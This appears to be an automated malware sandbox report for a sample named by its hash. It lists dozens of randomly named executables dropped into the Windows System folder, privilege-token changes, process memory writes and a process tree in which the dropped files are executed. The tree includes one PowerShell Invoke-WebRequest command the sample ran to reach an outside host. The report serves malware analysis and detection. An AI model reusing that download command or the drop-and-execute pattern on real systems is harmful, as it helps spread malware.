File created	C:\Windows\System\GyWBcOm.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\XHKheEs.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\DOpFiow.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\HDnsXYX.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\NEvTKAh.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\npMhwSS.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\lnTLksx.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\UfXeciU.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\APHrMXP.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\Zvrvdqg.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\PFlOpky.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\BnrvFEq.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\lUapiWn.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\KUktyNb.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\OEGbKVb.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\kfHXjVV.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\WbAyYbL.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\zhckFIZ.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\mNlDSNu.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\VsgvraC.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\INyEWSM.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\COtSGHm.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\ghMdCLq.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\NMOuLvW.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\USeVUXr.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\qXDbVpH.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\KQWUkHY.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\HPborYe.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\PvtifhO.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\CrwMAfY.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\tJGlBmm.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\rXInLhr.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\xnOTOtc.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\yBmXHIB.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\XNWbhBm.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\ZmWnmFT.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\TcZkpmo.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\VLzWRYo.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\QzexOJJ.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\QlRoGTy.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3408	powershell.exe
3408	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
Token: SeDebugPrivilege	3408	powershell.exe
Token: SeLockMemoryPrivilege	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4968 wrote to memory of 3408	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	91
PID 4968 wrote to memory of 3408	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	91
PID 4968 wrote to memory of 448	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	92
PID 4968 wrote to memory of 448	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	92
PID 4968 wrote to memory of 952	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	93
PID 4968 wrote to memory of 952	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	93
PID 4968 wrote to memory of 2744	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	94
PID 4968 wrote to memory of 2744	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	94
PID 4968 wrote to memory of 228	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	95
PID 4968 wrote to memory of 228	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	95
PID 4968 wrote to memory of 1416	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	96
PID 4968 wrote to memory of 1416	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	96
PID 4968 wrote to memory of 1484	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	97
PID 4968 wrote to memory of 1484	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	97
PID 4968 wrote to memory of 1420	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	98
PID 4968 wrote to memory of 1420	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	98
PID 4968 wrote to memory of 2376	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	99
PID 4968 wrote to memory of 2376	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	99
PID 4968 wrote to memory of 1524	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	100
PID 4968 wrote to memory of 1524	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	100
PID 4968 wrote to memory of 5040	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	101
PID 4968 wrote to memory of 5040	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	101
PID 4968 wrote to memory of 3112	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	102
PID 4968 wrote to memory of 3112	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	102
PID 4968 wrote to memory of 1708	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	103
PID 4968 wrote to memory of 1708	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	103
PID 4968 wrote to memory of 1212	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	104
PID 4968 wrote to memory of 1212	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	104
PID 4968 wrote to memory of 3152	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	105
PID 4968 wrote to memory of 3152	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	105
PID 4968 wrote to memory of 1608	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	106
PID 4968 wrote to memory of 1608	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	106
PID 4968 wrote to memory of 2176	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	107
PID 4968 wrote to memory of 2176	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	107
PID 4968 wrote to memory of 3956	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	108
PID 4968 wrote to memory of 3956	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	108
PID 4968 wrote to memory of 2284	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	109
PID 4968 wrote to memory of 2284	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	109
PID 4968 wrote to memory of 3128	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	110
PID 4968 wrote to memory of 3128	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	110
PID 4968 wrote to memory of 404	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	111
PID 4968 wrote to memory of 404	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	111
PID 4968 wrote to memory of 2172	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	112
PID 4968 wrote to memory of 2172	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	112
PID 4968 wrote to memory of 1508	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	113
PID 4968 wrote to memory of 1508	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	113
PID 4968 wrote to memory of 1176	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	114
PID 4968 wrote to memory of 1176	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	114
PID 4968 wrote to memory of 492	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	115
PID 4968 wrote to memory of 492	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	115
PID 4968 wrote to memory of 3104	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	116
PID 4968 wrote to memory of 3104	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	116
PID 4968 wrote to memory of 3220	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	117
PID 4968 wrote to memory of 3220	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	117
PID 4968 wrote to memory of 772	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	118
PID 4968 wrote to memory of 772	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	118
PID 4968 wrote to memory of 5032	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	119
PID 4968 wrote to memory of 5032	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	119
PID 4968 wrote to memory of 1908	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	120
PID 4968 wrote to memory of 1908	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	120
PID 4968 wrote to memory of 1432	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	121
PID 4968 wrote to memory of 1432	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	121
PID 4968 wrote to memory of 2548	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	122
PID 4968 wrote to memory of 2548	4968	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe	122

C:\Users\Admin\AppData\Local\Temp\5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
"C:\Users\Admin\AppData\Local\Temp\5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3408
- C:\Windows\System\nEaNZkv.exe
  C:\Windows\System\nEaNZkv.exe
  2⤵
  - Executes dropped EXE
  PID:448
- C:\Windows\System\ePLhJyz.exe
  C:\Windows\System\ePLhJyz.exe
  2⤵
  - Executes dropped EXE
  PID:952
- C:\Windows\System\PHDBLZV.exe
  C:\Windows\System\PHDBLZV.exe
  2⤵
  - Executes dropped EXE
  PID:2744
- C:\Windows\System\qcAldxe.exe
  C:\Windows\System\qcAldxe.exe
  2⤵
  - Executes dropped EXE
  PID:228
- C:\Windows\System\pJnNCuD.exe
  C:\Windows\System\pJnNCuD.exe
  2⤵
  - Executes dropped EXE
  PID:1416
- C:\Windows\System\jzoGckd.exe
  C:\Windows\System\jzoGckd.exe
  2⤵
  - Executes dropped EXE
  PID:1484
- C:\Windows\System\RIMYAAk.exe
  C:\Windows\System\RIMYAAk.exe
  2⤵
  - Executes dropped EXE
  PID:1420
- C:\Windows\System\kNMVEyZ.exe
  C:\Windows\System\kNMVEyZ.exe
  2⤵
  - Executes dropped EXE
  PID:2376
- C:\Windows\System\uyHeaIq.exe
  C:\Windows\System\uyHeaIq.exe
  2⤵
  - Executes dropped EXE
  PID:1524
- C:\Windows\System\TvKOWEu.exe
  C:\Windows\System\TvKOWEu.exe
  2⤵
  - Executes dropped EXE
  PID:5040
- C:\Windows\System\iDfChqj.exe
  C:\Windows\System\iDfChqj.exe
  2⤵
  - Executes dropped EXE
  PID:3112
- C:\Windows\System\zWtgLsZ.exe
  C:\Windows\System\zWtgLsZ.exe
  2⤵
  - Executes dropped EXE
  PID:1708
- C:\Windows\System\cvArJxS.exe
  C:\Windows\System\cvArJxS.exe
  2⤵
  - Executes dropped EXE
  PID:1212
- C:\Windows\System\VCNcbju.exe
  C:\Windows\System\VCNcbju.exe
  2⤵
  - Executes dropped EXE
  PID:3152
- C:\Windows\System\qgOVFbg.exe
  C:\Windows\System\qgOVFbg.exe
  2⤵
  - Executes dropped EXE
  PID:1608
- C:\Windows\System\jMdCsYm.exe
  C:\Windows\System\jMdCsYm.exe
  2⤵
  - Executes dropped EXE
  PID:2176
- C:\Windows\System\qdXWwDu.exe
  C:\Windows\System\qdXWwDu.exe
  2⤵
  - Executes dropped EXE
  PID:3956
- C:\Windows\System\MtWdbcY.exe
  C:\Windows\System\MtWdbcY.exe
  2⤵
  - Executes dropped EXE
  PID:2284
- C:\Windows\System\XalpoPJ.exe
  C:\Windows\System\XalpoPJ.exe
  2⤵
  - Executes dropped EXE
  PID:3128
- C:\Windows\System\tDfAwqo.exe
  C:\Windows\System\tDfAwqo.exe
  2⤵
  - Executes dropped EXE
  PID:404
- C:\Windows\System\JmcGIYp.exe
  C:\Windows\System\JmcGIYp.exe
  2⤵
  - Executes dropped EXE
  PID:2172
- C:\Windows\System\IvRGQie.exe
  C:\Windows\System\IvRGQie.exe
  2⤵
  - Executes dropped EXE
  PID:1508
- C:\Windows\System\EnKIXDM.exe
  C:\Windows\System\EnKIXDM.exe
  2⤵
  - Executes dropped EXE
  PID:1176
- C:\Windows\System\ncvCfDZ.exe
  C:\Windows\System\ncvCfDZ.exe
  2⤵
  - Executes dropped EXE
  PID:492
- C:\Windows\System\REIXvhO.exe
  C:\Windows\System\REIXvhO.exe
  2⤵
  - Executes dropped EXE
  PID:3104
- C:\Windows\System\njnrMLi.exe
  C:\Windows\System\njnrMLi.exe
  2⤵
  - Executes dropped EXE
  PID:3220
- C:\Windows\System\zaWSTcl.exe
  C:\Windows\System\zaWSTcl.exe
  2⤵
  - Executes dropped EXE
  PID:772
- C:\Windows\System\ccJlHSZ.exe
  C:\Windows\System\ccJlHSZ.exe
  2⤵
  - Executes dropped EXE
  PID:5032
- C:\Windows\System\wYhfTIx.exe
  C:\Windows\System\wYhfTIx.exe
  2⤵
  - Executes dropped EXE
  PID:1908
- C:\Windows\System\sgeQTxY.exe
  C:\Windows\System\sgeQTxY.exe
  2⤵
  - Executes dropped EXE
  PID:1432
- C:\Windows\System\VQOoQVL.exe
  C:\Windows\System\VQOoQVL.exe
  2⤵
  - Executes dropped EXE
  PID:2548
- C:\Windows\System\YPNzkZf.exe
  C:\Windows\System\YPNzkZf.exe
  2⤵
  - Executes dropped EXE
  PID:4468
- C:\Windows\System\QErIiGt.exe
  C:\Windows\System\QErIiGt.exe
  2⤵
  - Executes dropped EXE
  PID:4308
- C:\Windows\System\BgIcnDT.exe
  C:\Windows\System\BgIcnDT.exe
  2⤵
  - Executes dropped EXE
  PID:5112
- C:\Windows\System\hgNSbQK.exe
  C:\Windows\System\hgNSbQK.exe
  2⤵
  - Executes dropped EXE
  PID:4268
- C:\Windows\System\TXXjpkd.exe
  C:\Windows\System\TXXjpkd.exe
  2⤵
  - Executes dropped EXE
  PID:1436
- C:\Windows\System\ZoOXYWX.exe
  C:\Windows\System\ZoOXYWX.exe
  2⤵
  - Executes dropped EXE
  PID:904
- C:\Windows\System\aIfHPFF.exe
  C:\Windows\System\aIfHPFF.exe
  2⤵
  - Executes dropped EXE
  PID:2040
- C:\Windows\System\obMQXPc.exe
  C:\Windows\System\obMQXPc.exe
  2⤵
  - Executes dropped EXE
  PID:2216
- C:\Windows\System\iNoHqUO.exe
  C:\Windows\System\iNoHqUO.exe
  2⤵
  - Executes dropped EXE
  PID:5060
- C:\Windows\System\kDqnXGM.exe
  C:\Windows\System\kDqnXGM.exe
  2⤵
  - Executes dropped EXE
  PID:1052
- C:\Windows\System\LrpubsH.exe
  C:\Windows\System\LrpubsH.exe
  2⤵
  - Executes dropped EXE
  PID:1428
- C:\Windows\System\AEQPVoB.exe
  C:\Windows\System\AEQPVoB.exe
  2⤵
  - Executes dropped EXE
  PID:2948
- C:\Windows\System\pRncfsP.exe
  C:\Windows\System\pRncfsP.exe
  2⤵
  - Executes dropped EXE
  PID:1276
- C:\Windows\System\FlDXjzL.exe
  C:\Windows\System\FlDXjzL.exe
  2⤵
  - Executes dropped EXE
  PID:4112
- C:\Windows\System\TAMXbDT.exe
  C:\Windows\System\TAMXbDT.exe
  2⤵
  - Executes dropped EXE
  PID:3264
- C:\Windows\System\tjGpBof.exe
  C:\Windows\System\tjGpBof.exe
  2⤵
  - Executes dropped EXE
  PID:4784
- C:\Windows\System\vaptrff.exe
  C:\Windows\System\vaptrff.exe
  2⤵
  - Executes dropped EXE
  PID:4972
- C:\Windows\System\TBzcGIt.exe
  C:\Windows\System\TBzcGIt.exe
  2⤵
  - Executes dropped EXE
  PID:116
- C:\Windows\System\oZFkqxu.exe
  C:\Windows\System\oZFkqxu.exe
  2⤵
  - Executes dropped EXE
  PID:4964
- C:\Windows\System\LvlsvyC.exe
  C:\Windows\System\LvlsvyC.exe
  2⤵
  - Executes dropped EXE
  PID:2196
- C:\Windows\System\IMJTfyp.exe
  C:\Windows\System\IMJTfyp.exe
  2⤵
  - Executes dropped EXE
  PID:3416
- C:\Windows\System\NINHNyK.exe
  C:\Windows\System\NINHNyK.exe
  2⤵
  - Executes dropped EXE
  PID:3256
- C:\Windows\System\AxEaETa.exe
  C:\Windows\System\AxEaETa.exe
  2⤵
  - Executes dropped EXE
  PID:5124
- C:\Windows\System\frEoRKQ.exe
  C:\Windows\System\frEoRKQ.exe
  2⤵
  - Executes dropped EXE
  PID:5152
- C:\Windows\System\XcQcrPw.exe
  C:\Windows\System\XcQcrPw.exe
  2⤵
  - Executes dropped EXE
  PID:5176
- C:\Windows\System\FsPHqla.exe
  C:\Windows\System\FsPHqla.exe
  2⤵
  - Executes dropped EXE
  PID:5204
- C:\Windows\System\QtHifhY.exe
  C:\Windows\System\QtHifhY.exe
  2⤵
  - Executes dropped EXE
  PID:5232
- C:\Windows\System\PmlqaNC.exe
  C:\Windows\System\PmlqaNC.exe
  2⤵
  - Executes dropped EXE
  PID:5272
- C:\Windows\System\fZXjxwQ.exe
  C:\Windows\System\fZXjxwQ.exe
  2⤵
  - Executes dropped EXE
  PID:5304
- C:\Windows\System\ymNsKpV.exe
  C:\Windows\System\ymNsKpV.exe
  2⤵
  - Executes dropped EXE
  PID:5320
- C:\Windows\System\OEunoRd.exe
  C:\Windows\System\OEunoRd.exe
  2⤵
  - Executes dropped EXE
  PID:5344
- C:\Windows\System\KUktyNb.exe
  C:\Windows\System\KUktyNb.exe
  2⤵
  - Executes dropped EXE
  PID:5372
- C:\Windows\System\iokSeeJ.exe
  C:\Windows\System\iokSeeJ.exe
  2⤵
  - Executes dropped EXE
  PID:5412
- C:\Windows\System\TtnTTNF.exe
  C:\Windows\System\TtnTTNF.exe
  2⤵
  PID:5444
- C:\Windows\System\AsZlxLC.exe
  C:\Windows\System\AsZlxLC.exe
  2⤵
  PID:5484
- C:\Windows\System\PerVnln.exe
  C:\Windows\System\PerVnln.exe
  2⤵
  PID:5504
- C:\Windows\System\egIyZMn.exe
  C:\Windows\System\egIyZMn.exe
  2⤵
  PID:5524
- C:\Windows\System\tKXpxjK.exe
  C:\Windows\System\tKXpxjK.exe
  2⤵
  PID:5552
- C:\Windows\System\xfuvGOP.exe
  C:\Windows\System\xfuvGOP.exe
  2⤵
  PID:5576
- C:\Windows\System\zjVDgVW.exe
  C:\Windows\System\zjVDgVW.exe
  2⤵
  PID:5604
- C:\Windows\System\jQdBjis.exe
  C:\Windows\System\jQdBjis.exe
  2⤵
  PID:5636
- C:\Windows\System\vXhGllS.exe
  C:\Windows\System\vXhGllS.exe
  2⤵
  PID:5660
- C:\Windows\System\rwspPlV.exe
  C:\Windows\System\rwspPlV.exe
  2⤵
  PID:5688
- C:\Windows\System\VtTeIBM.exe
  C:\Windows\System\VtTeIBM.exe
  2⤵
  PID:5716
- C:\Windows\System\psbmSTa.exe
  C:\Windows\System\psbmSTa.exe
  2⤵
  PID:5744
- C:\Windows\System\JDMthgv.exe
  C:\Windows\System\JDMthgv.exe
  2⤵
  PID:5772
- C:\Windows\System\OOSfNVh.exe
  C:\Windows\System\OOSfNVh.exe
  2⤵
  PID:5800
- C:\Windows\System\HmmsAXz.exe
  C:\Windows\System\HmmsAXz.exe
  2⤵
  PID:5840
- C:\Windows\System\PFtbcxV.exe
  C:\Windows\System\PFtbcxV.exe
  2⤵
  PID:5872
- C:\Windows\System\SkcliAM.exe
  C:\Windows\System\SkcliAM.exe
  2⤵
  PID:5888
- C:\Windows\System\DXpkoBT.exe
  C:\Windows\System\DXpkoBT.exe
  2⤵
  PID:5916
- C:\Windows\System\BHPvgpW.exe
  C:\Windows\System\BHPvgpW.exe
  2⤵
  PID:5952
- C:\Windows\System\zwUTnIz.exe
  C:\Windows\System\zwUTnIz.exe
  2⤵
  PID:5992
- C:\Windows\System\dHfQngI.exe
  C:\Windows\System\dHfQngI.exe
  2⤵
  PID:6012
- C:\Windows\System\FCPZryE.exe
  C:\Windows\System\FCPZryE.exe
  2⤵
  PID:6040
- C:\Windows\System\nGEuAyI.exe
  C:\Windows\System\nGEuAyI.exe
  2⤵
  PID:6056
- C:\Windows\System\fYUJDas.exe
  C:\Windows\System\fYUJDas.exe
  2⤵
  PID:6092
- C:\Windows\System\UVTxToo.exe
  C:\Windows\System\UVTxToo.exe
  2⤵
  PID:6124
- C:\Windows\System\ouRKXID.exe
  C:\Windows\System\ouRKXID.exe
  2⤵
  PID:3140
- C:\Windows\System\fqkahcU.exe
  C:\Windows\System\fqkahcU.exe
  2⤵
  PID:4544
- C:\Windows\System\rhceEfj.exe
  C:\Windows\System\rhceEfj.exe
  2⤵
  PID:3756
- C:\Windows\System\ehhhMrm.exe
  C:\Windows\System\ehhhMrm.exe
  2⤵
  PID:5056
- C:\Windows\System\DwgFzNc.exe
  C:\Windows\System\DwgFzNc.exe
  2⤵
  PID:5140
- C:\Windows\System\KtyhkmD.exe
  C:\Windows\System\KtyhkmD.exe
  2⤵
  PID:5224
- C:\Windows\System\kEMKMly.exe
  C:\Windows\System\kEMKMly.exe
  2⤵
  PID:5292
- C:\Windows\System\rMBujjd.exe
  C:\Windows\System\rMBujjd.exe
  2⤵
  PID:5336
- C:\Windows\System\vFVkfdo.exe
  C:\Windows\System\vFVkfdo.exe
  2⤵
  PID:5392
- C:\Windows\System\IXnUQtU.exe
  C:\Windows\System\IXnUQtU.exe
  2⤵
  PID:5436
- C:\Windows\System\pnQgZUA.exe
  C:\Windows\System\pnQgZUA.exe
  2⤵
  PID:5512
- C:\Windows\System\zsuuFXU.exe
  C:\Windows\System\zsuuFXU.exe
  2⤵
  PID:5592
- C:\Windows\System\yInIYod.exe
  C:\Windows\System\yInIYod.exe
  2⤵
  PID:5652
- C:\Windows\System\nQdWIjH.exe
  C:\Windows\System\nQdWIjH.exe
  2⤵
  PID:5708
- C:\Windows\System\tNEPSFg.exe
  C:\Windows\System\tNEPSFg.exe
  2⤵
  PID:5768
- C:\Windows\System\KuLVDdJ.exe
  C:\Windows\System\KuLVDdJ.exe
  2⤵
  PID:5828
- C:\Windows\System\UvLUvJo.exe
  C:\Windows\System\UvLUvJo.exe
  2⤵
  PID:5884
- C:\Windows\System\gZJeeTz.exe
  C:\Windows\System\gZJeeTz.exe
  2⤵
  PID:5980
- C:\Windows\System\kMoMklo.exe
  C:\Windows\System\kMoMklo.exe
  2⤵
  PID:6072
- C:\Windows\System\WpkisgP.exe
  C:\Windows\System\WpkisgP.exe
  2⤵
  PID:6136
- C:\Windows\System\ZmFUDwj.exe
  C:\Windows\System\ZmFUDwj.exe
  2⤵
  PID:3964
- C:\Windows\System\ZsDZIcp.exe
  C:\Windows\System\ZsDZIcp.exe
  2⤵
  PID:1528
- C:\Windows\System\QRdlubD.exe
  C:\Windows\System\QRdlubD.exe
  2⤵
  PID:5268
- C:\Windows\System\fkxLIKF.exe
  C:\Windows\System\fkxLIKF.exe
  2⤵
  PID:5364
- C:\Windows\System\jkmIcrw.exe
  C:\Windows\System\jkmIcrw.exe
  2⤵
  PID:5496
- C:\Windows\System\dVSrPhz.exe
  C:\Windows\System\dVSrPhz.exe
  2⤵
  PID:5680
- C:\Windows\System\YdoCOpD.exe
  C:\Windows\System\YdoCOpD.exe
  2⤵
  PID:5816
- C:\Windows\System\PXBtPKi.exe
  C:\Windows\System\PXBtPKi.exe
  2⤵
  PID:5968
- C:\Windows\System\ATLFLby.exe
  C:\Windows\System\ATLFLby.exe
  2⤵
  PID:3856
- C:\Windows\System\bLhgAII.exe
  C:\Windows\System\bLhgAII.exe
  2⤵
  PID:5316
- C:\Windows\System\bYcRAAn.exe
  C:\Windows\System\bYcRAAn.exe
